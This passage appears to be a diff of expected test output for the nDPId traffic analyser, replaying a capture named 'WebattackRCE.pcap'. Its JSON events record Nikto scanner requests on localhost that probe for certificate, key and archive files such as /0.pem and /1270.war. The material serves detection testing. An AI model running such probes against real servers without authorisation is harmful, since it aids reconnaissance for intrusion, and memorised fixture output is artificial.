-01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":412,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277324,"flow_last_seen":1576420277324,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277324,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50368,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01050{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":412,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277324,"flow_last_seen":1576420277324,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277324,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50368,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":413,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277325,"flow_last_seen":1576420277325,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277325,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50370,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":413,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":413,"flow_packet_id":1,"flow_last_seen":1576420277325,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277325,"pkt":"AAAAAAAAAAAAAAAACABFAAC96FRAAEAGU+R\/AAABfwAAAcTCH5AdeNDi26Tri4AYAED+sQAAAQEICp1m\/XWdZv11R0VUIC8wLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":413,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277325,"flow_last_seen":1576420277325,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277325,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50370,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":413,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":413,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277325,"flow_last_seen":1576420277325,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277325,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50370,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":414,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277326,"flow_last_seen":1576420277326,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277326,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50372,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":414,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":414,"flow_packet_id":1,"flow_last_seen":1576420277326,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277326,"pkt":"AAAAAAAAAAAAAAAACABFAAC95+5AAEAGVEp\/AAABfwAAAcTEH5Cz199gOp5CH4AYAED+sQAAAQEICp1m\/XadZv12R0VUIC8wLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":414,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277326,"flow_last_seen":1576420277326,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277326,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50372,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01046{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":414,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":414,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277326,"flow_last_seen":1576420277326,"flow_idle_time":7580000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277326,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50372,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":415,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277328,"flow_last_seen":1576420277328,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277328,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50374,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":415,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":415,"flow_packet_id":1,"flow_last_seen":1576420277328,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277328,"pkt":"AAAAAAAAAAAAAAAACABFAADAqSFAAEAGkxR\/AAABfwAAAcTGH5DtDpGsIyeJWoAYAED+tAAAAQEICp1m\/XidZv14R0VUIC8xMjcwLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277328,"flow_last_seen":1576420277328,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277328,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50374,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":415,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":415,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277328,"flow_last_seen":1576420277328,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277328,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50374,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":416,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277329,"flow_last_seen":1576420277329,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277329,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50376,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":416,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":416,"flow_packet_id":1,"flow_last_seen":1576420277329,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277329,"pkt":"AAAAAAAAAAAAAAAACABFAADA2JJAAEAGY6N\/AAABfwAAAcTIH5BNx+AlanMTuoAYAED+tAAAAQEICp1m\/XmdZv15R0VUIC8xMjcwLndhciBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":416,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277329,"flow_last_seen":1576420277329,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277329,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50376,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":416,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":416,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277329,"flow_last_seen":1576420277329,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277329,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50376,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1270.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":417,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277331,"flow_last_seen":1576420277331,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277331,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50378,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":417,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":417,"flow_packet_id":1,"flow_last_seen":1576420277331,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277331,"pkt":"AAAAAAAAAAAAAAAACABFAADHC9ZAAEAGMFl\/AAABfwAAAcTKH5CiFTNhL7Iog4AYAED+uwAAAQEICp1m\/XqdZv16R0VUIC8xMjcuMC4wLnRhci5iejIgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":417,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277331,"flow_last_seen":1576420277331,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277331,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50378,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":417,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277331,"flow_last_seen":1576420277331,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277331,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50378,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":418,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277333,"flow_last_seen":1576420277333,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277333,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50380,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":418,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":418,"flow_packet_id":1,"flow_last_seen":1576420277333,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420277333,"pkt":"AAAAAAAAAAAAAAAACABFAADHgXtAAEAGurN\/AAABfwAAAcTMH5Cx2rnNvwRWuoAYAED+uwAAAQEICp1m\/X2dZv19R0VUIC8xMjcuMC4wLnRhci5iejIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":418,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277333,"flow_last_seen":1576420277333,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277333,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50380,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":418,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":418,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277333,"flow_last_seen":1576420277333,"flow_idle_time":7580000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420277333,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50380,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.0.0.tar.bz2","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277334,"flow_last_seen":1576420277334,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277334,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50382,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":419,"flow_packet_id":1,"flow_last_seen":1576420277334,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277334,"pkt":"AAAAAAAAAAAAAAAACABFAADFmcZAAEAGomp\/AAABfwAAAcTOH5DYYKFyIBNeYIAYAED+uQAAAQEICp1m\/X6dZv1+R0VUIC8xMjdfMF8wXzEuY2VyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277334,"flow_last_seen":1576420277334,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277334,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50382,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} +01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":419,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277334,"flow_last_seen":1576420277334,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277334,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50382,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127_0_0_1.cer","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":420,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":420,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277336,"flow_last_seen":1576420277336,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277336,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50384,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 